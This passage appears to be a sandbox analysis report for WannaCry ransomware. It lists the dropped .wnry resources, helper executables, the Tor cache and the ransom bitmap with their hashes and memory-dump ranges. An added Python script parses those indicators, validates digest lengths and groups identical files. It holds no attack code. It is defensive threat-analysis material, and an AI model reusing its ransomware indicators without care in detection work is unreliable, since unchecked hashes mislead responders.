SHA512 f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc
-
C:\Users\Admin\AppData\Local\Temp\msg\m_korean.wnry
Filesize 89KB
MD5 6735cb43fe44832b061eeb3f5956b099
SHA1 d636daf64d524f81367ea92fdafa3726c909bee1
SHA256 552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0
SHA512 60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e
-
C:\Users\Admin\AppData\Local\Temp\msg\m_latvian.wnry
Filesize 40KB
MD5 c33afb4ecc04ee1bcc6975bea49abe40
SHA1 fbea4f170507cde02b839527ef50b7ec74b4821f
SHA256 a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536
SHA512 0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44
-
C:\Users\Admin\AppData\Local\Temp\msg\m_norwegian.wnry
Filesize 36KB
MD5 ff70cc7c00951084175d12128ce02399
SHA1 75ad3b1ad4fb14813882d88e952208c648f1fd18
SHA256 cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a
SHA512 f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19
-
C:\Users\Admin\AppData\Local\Temp\msg\m_polish.wnry
Filesize 38KB
MD5 e79d7f2833a9c2e2553c7fe04a1b63f4
SHA1 3d9f56d2381b8fe16042aa7c4feb1b33f2baebff
SHA256 519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e
SHA512 e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de
-
C:\Users\Admin\AppData\Local\Temp\msg\m_portuguese.wnry
Filesize 37KB
MD5 fa948f7d8dfb21ceddd6794f2d56b44f
SHA1 ca915fbe020caa88dd776d89632d7866f660fc7a
SHA256 bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66
SHA512 0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a
-
C:\Users\Admin\AppData\Local\Temp\msg\m_romanian.wnry
Filesize 50KB
MD5 313e0ececd24f4fa1504118a11bc7986
SHA1 e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d
SHA256 70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1
SHA512 c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730
-
C:\Users\Admin\AppData\Local\Temp\msg\m_russian.wnry
Filesize 46KB
MD5 452615db2336d60af7e2057481e4cab5
SHA1 442e31f6556b3d7de6eb85fbac3d2957b7f5eac6
SHA256 02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078
SHA512 7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f
-
C:\Users\Admin\AppData\Local\Temp\msg\m_slovak.wnry
Filesize 40KB
MD5 c911aba4ab1da6c28cf86338ab2ab6cc
SHA1 fee0fd58b8efe76077620d8abc7500dbfef7c5b0
SHA256 e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729
SHA512 3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a
-
C:\Users\Admin\AppData\Local\Temp\msg\m_spanish.wnry
Filesize 36KB
MD5 8d61648d34cba8ae9d1e2a219019add1
SHA1 2091e42fc17a0cc2f235650f7aad87abf8ba22c2
SHA256 72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1
SHA512 68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079
-
C:\Users\Admin\AppData\Local\Temp\msg\m_swedish.wnry
Filesize 37KB
MD5 c7a19984eb9f37198652eaf2fd1ee25c
SHA1 06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae
SHA256 146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4
SHA512 43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020
-
C:\Users\Admin\AppData\Local\Temp\msg\m_turkish.wnry
Filesize 41KB
MD5 531ba6b1a5460fc9446946f91cc8c94b
SHA1 cc56978681bd546fd82d87926b5d9905c92a5803
SHA256 6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415
SHA512 ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9
-
C:\Users\Admin\AppData\Local\Temp\msg\m_vietnamese.wnry
Filesize 91KB
MD5 8419be28a0dcec3f55823620922b00fa
SHA1 2e4791f9cdfca8abf345d606f313d22b36c46b92
SHA256 1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8
SHA512 8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386
-
C:\Users\Admin\AppData\Local\Temp\r.wnry
Filesize 864B
MD5 3e0020fc529b1c2a061016dd2469ba96
SHA1 c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade
SHA256 402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c
SHA512 5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf
-
C:\Users\Admin\AppData\Local\Temp\s.wnry
Filesize 2.9MB
MD5 ad4c9de7c8c40813f200ba1c2fa33083
SHA1 d1af27518d455d432b62d73c6a1497d032f6120e
SHA256 e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b
SHA512 115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617
-
C:\Users\Admin\AppData\Local\Temp\t.wnry
Filesize 64KB
MD5 5dcaac857e695a65f5c3ef1441a73a8f
SHA1 7b10aaeee05e7a1efb43d9f837e9356ad55c07dd
SHA256 97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6
SHA512 06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
Filesize 20KB
MD5 4fef5e34143e646dbf9907c4374276f5
SHA1 47a9ad4125b6bd7c55e4e7da251e23f089407b8f
SHA256 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
SHA512 4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
Filesize 20KB
MD5 8495400f199ac77853c53b5a3f278f3e
SHA1 be5d6279874da315e3080b06083757aad9b32c23
SHA256 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
SHA512 0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4
-
C:\Users\Admin\AppData\Local\Temp\u.wnry
Filesize 240KB
MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize 3KB
MD5 ca5983a592d5047e58efffb6d0bc4263
SHA1 c82da2fe80f95d209c12ce25fa69ef140977f2e0
SHA256 f63eeb55c97ba9aaac82fe060ce90cecdca500da2376a3388af3e7b53582b367
SHA512 4e41896cf3970e6981f3a0349affff3bc8d7b98218ff8ac5c53a469677bd8cb5ba0a344b637e1e574556bde0a3f17282e0fc7b0a76c5362f917fa7989c5329ef
-
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new
Filesize 8.7MB
MD5 c318c7bf602547c460a142931a10d586
SHA1 f3f5e19b0b7b6d5f091c9e3b2019a6cbfd3c15df
SHA256 a54dab6c73945336c758f4cd8bbcd7443c60be4870033662dc3307bcd9b06ae5
SHA512 278f99a92e8784c9186ead59d393f6d138467ddda153c31f337e12e775ea61ba791f9a4785fbfe5611aa52580bffbb973aaadfd60010af98372df3e51354a7c5
-
C:\Users\Default\Desktop\@WanaDecryptor@.bmp
Filesize 1.4MB
MD5 c17170262312f3be7027bc2ca825bf0c
SHA1 f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256 d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512 c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c
-
C:\note.txt
Filesize 218B
MD5 afa6955439b8d516721231029fb9ca1b
SHA1 087a043cc123c0c0df2ffadcf8e71e3ac86bbae9
SHA256 8e9f20f6864c66576536c0b866c6ffdcf11397db67fe120e972e244c3c022270
SHA512 5da21a31fbc4e8250dffed30f66b896bdf007ac91948140334fe36a3f010e1bac3e70a07e9f3eb9da8633189091fd5cadcabbaacd3e01da0fe7ae28a11b3dddf
-
memory/1572-187-0x0000000010000000-0x0000000010010000-memory.dmp
Filesize 64KB
-
memory/4736-1848-0x0000000072B90000-0x0000000072DAC000-memory.dmp
Filesize 2.1MB
-
memory/4736-1785-0x0000000000870000-0x0000000000B6E000-memory.dmp
Filesize 3.0MB
-
memory/4736-1615-0x0000000072E30000-0x0000000072E52000-memory.dmp
Filesize 136KB
-
memory/4736-1614-0x0000000072E60000-0x0000000072EE2000-memory.dmp
Filesize 520KB
-
memory/4736-1613-0x00000000735D0000-0x00000000735EC000-memory.dmp
Filesize 112KB
-
memory/4736-1612-0x0000000072EF0000-0x0000000072F72000-memory.dmp
Filesize 520KB
-
memory/4736-1611-0x0000000000870000-0x0000000000B6E000-memory.dmp
Filesize 3.0MB
-
memory/4736-1617-0x0000000072B90000-0x0000000072DAC000-memory.dmp
Filesize 2.1MB
-
memory/4736-1582-0x0000000000870000-0x0000000000B6E000-memory.dmp
Filesize 3.0MB
-
memory/4736-1581-0x0000000072E30000-0x0000000072E52000-memory.dmp
Filesize 136KB
-
memory/4736-1580-0x0000000072E60000-0x0000000072EE2000-memory.dmp
Filesize 520KB
-
memory/4736-1579-0x0000000072B90000-0x0000000072DAC000-memory.dmp
Filesize 2.1MB
-
memory/4736-1578-0x0000000072EF0000-0x0000000072F72000-memory.dmp
Filesize 520KB
-
memory/4736-1627-0x0000000000870000-0x0000000000B6E000-memory.dmp
Filesize 3.0MB
-
memory/4736-1633-0x0000000072B90000-0x0000000072DAC000-memory.dmp
Filesize 2.1MB
-
memory/4736-1616-0x0000000072DB0000-0x0000000072E27000-memory.dmp
Filesize 476KB
-
memory/4736-1791-0x0000000072B90000-0x0000000072DAC000-memory.dmp
Filesize 2.1MB
-
memory/4736-1842-0x0000000000870000-0x0000000000B6E000-memory.dmp
Filesize 3.0MB
-
memory/4736-1936-0x0000000072B90000-0x0000000072DAC000-memory.dmp
Filesize 2.1MB
-
memory/4736-1880-0x0000000000870000-0x0000000000B6E000-memory.dmp
Filesize 3.0MB
-
memory/4736-1886-0x0000000072B90000-0x0000000072DAC000-memory.dmp
Filesize 2.1MB
-
memory/4736-1906-0x0000000000870000-0x0000000000B6E000-memory.dmp
Filesize 3.0MB
-
memory/4736-1912-0x0000000072B90000-0x0000000072DAC000-memory.dmp
Filesize 2.1MB
-
memory/4736-1930-0x0000000000870000-0x0000000000B6E000-memory.dmp
Filesize 3.0MB
-
memory/5392-1949-0x0000000008AF0000-0x0000000008AF1000-memory.dmp
Filesize 4KB
-
memory/5392-1947-0x0000000008AF0000-0x0000000008AF1000-memory.dmp
Filesize 4KB
-
memory/5392-1956-0x0000000008AF0000-0x0000000008AF1000-memory.dmp
Filesize 4KB
-
memory/5392-1954-0x0000000008AF0000-0x0000000008AF1000-memory.dmp
Filesize 4KB
-
memory/5392-1955-0x0000000008AF0000-0x0000000008AF1000-memory.dmp
Filesize 4KB
-
memory/5392-1950-0x0000000008AF0000-0x0000000008AF1000-memory.dmp
Filesize 4KB
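The dropped-file listing above is the part of this report a responder turns into indicators, and the text extraction has fused each field label to its value ("MD5" glued to the digest, "Filesize" glued to the path). The script below is an added example written for this page; it is not part of the sandbox report or of any Triage tooling. It parses that flattened form (and the spaced form) into records, checks that every digest has the length its algorithm requires, collapses verbatim repeats such as the eight identical MEMZ.exe records, and groups different paths whose SHA-256 is identical. SAMPLE is constructed from entries copied out of the report; the truncated.bin record is invented and deliberately malformed so the length check has something to flag, and the memory/ skip mirrors the memory-dump section that follows the file listing.

```python
"""Parse a flattened Triage 'Files' listing into structured records.
Added example for this page, not part of the sandbox report or any Triage tooling.
Extraction fused each label to its value ('MD5<hex>', '<path>Filesize'); both that
form and the spaced form parse. SAMPLE is built from the report's own entries plus
one invented, malformed record (truncated.bin).
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field

# Hex-digest lengths; any other length means a truncated or garbled hash.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s*([0-9a-fA-F]*)$")

@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)

    def problems(self):
        # Missing digests and digests of the wrong length, as messages.
        out = []
        for algo, want in DIGEST_LEN.items():
            got = self.hashes.get(algo)
            if got is None:
                out.append(f"{self.path}: missing {algo}")
            elif len(got) != want:
                out.append(f"{self.path}: {algo} has {len(got)} hex chars, expected {want}")
        return out

def parse_files(text):
    """Split on the report's '-' separator lines; skip memory-dump records."""
    entries = []
    for block in re.split(r"^-\s*$", text, flags=re.M):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        if not lines or not lines[0].endswith("Filesize") or lines[0].startswith("memory/"):
            continue
        rec = DroppedFile(lines[0][: -len("Filesize")].rstrip())
        for ln in lines[2:]:  # lines[1] is the human-readable size
            m = _HASH_RE.match(ln)
            if m:
                rec.hashes[m.group(1)] = m.group(2).lower()
        entries.append(rec)
    return entries

def dedupe(entries):
    """Collapse verbatim repeats (same path, same SHA-256) in first-seen order;
    the Counter says how often each record appeared."""
    seen, unique = Counter(), []
    for e in entries:
        key = (e.path, e.hashes.get("SHA256"))
        if not seen[key]:
            unique.append(e)
        seen[key] += 1
    return unique, seen

def aliases_by_content(entries):
    # SHA-256 -> sorted distinct paths, only for digests seen under more than one path.
    paths = defaultdict(set)
    for e in entries:
        if "SHA256" in e.hashes:
            paths[e.hashes["SHA256"]].add(e.path)
    return {sha: sorted(p) for sha, p in paths.items() if len(p) > 1}

# Constructed from the report's entries (MEMZ.exe twice, as listed); truncated.bin is invented.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exeFilesize
240KB
MD57bf2b57f2a205768755c07f238fb32cc
SHA145356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA51291a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exeFilesize
16KB
MD51d5ad9c8d3fee874d0feb8bfac220a11
SHA1ca6d3f7e6c784155f664a9179ca64e4034df9595
SHA2563872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff
SHA512c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exeFilesize
16KB
MD51d5ad9c8d3fee874d0feb8bfac220a11
SHA1ca6d3f7e6c784155f664a9179ca64e4034df9595
SHA2563872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff
SHA512c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1
-
C:\Users\Admin\AppData\Local\Temp\u.wnryFilesize
240KB
MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
C:\constructed\truncated.binFilesize
1KB
MD5deadbeef
"""
```

Run over the full listing above, `aliases_by_content` also pairs b.wnry with C:\Users\Default\Desktop\@WanaDecryptor@.bmp and tor.exe with taskhsvc.exe, since each pair carries the same SHA-256 in the report: the staged .wnry resources and the renamed Tor binary are the same bytes under different names, so a hash-based allow or block list needs only one entry per pair, while a path-based detection needs both. The length check is the sanity gate to apply before any of these digests are pasted into a blocklist, because a digest shortened by one hex character matches nothing.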